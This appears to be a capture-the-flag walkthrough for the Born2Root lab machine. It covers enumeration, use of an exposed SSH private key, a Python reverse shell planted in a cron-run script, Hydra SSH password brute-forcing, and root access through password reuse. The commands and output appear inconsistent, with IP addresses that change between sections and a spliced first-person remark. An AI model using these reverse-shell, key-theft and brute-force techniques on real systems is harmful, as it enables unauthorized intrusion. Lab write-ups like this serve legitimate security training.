pg-born2root-play

Exploitation Guide for Born2Root

Summary

Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.

Enumeration

Nmap

We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.

kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39832/tcp6  status
|   100024  1          47504/udp   status
|   100024  1          50443/udp6  status
|_  100024  1          52205/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information.

We should take note of the username martin that appears twice on this page: in the About Us section and in the Contact Us section.

GoBuster

We will use GoBuster to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.

kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...

Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.

kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

Exploitation

Local SSH Access

Let’s give this key proper permissions and then use it to SSH as martin (we can just hit enter when prompted for secret password).

kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born 
...

READY TO ACCESS THE SECRET LAB ? 

secret password : 
WELCOME ! 
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)

Escalation

Local Enumeration

Checking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy.

martin@debian:~$ cat /etc/cron*
...
*/5   * * * *   jimmy   python /tmp/sekurity.py

Reverse Shell

We can copy a Python reverse shell into the sekurity.py file chmod+x sekurity.py and wait 5 minutes for the cronjob to be executed.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.

After a few minutes, we catch our shell:

kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$

SSH Login Brute-Force

Let’s check /etc/passwd to get a list of available users on the system:

jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

The user Hadi stands out as another user also mentioned on the company website.

kali@kali:~$ cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt 
I then used the text file with Hydra to bruteforce SSH which actually worked.

Now we can try brute-forcing the password for the user hadi using Hydra:

kali@kali:~$ hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26

 

We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:

jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Escalation to Root

The password for root was re-used and is the same as hadi‘s: hadi123.

hadi@debian:~$ su -
Password:
root@debian:~# whoami
root

explained

root@debian:/var/spool/cron# cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
THE RABBIT HOLE

The networker binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about go try and deal with that.

Instead, I’m going to go back to my OSCP training

kali@kali:~$ sudo nc -nlvp 80
Password: 
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 *** 
/sbin/ifconfig
/bin/ping -c 1 localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$

.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *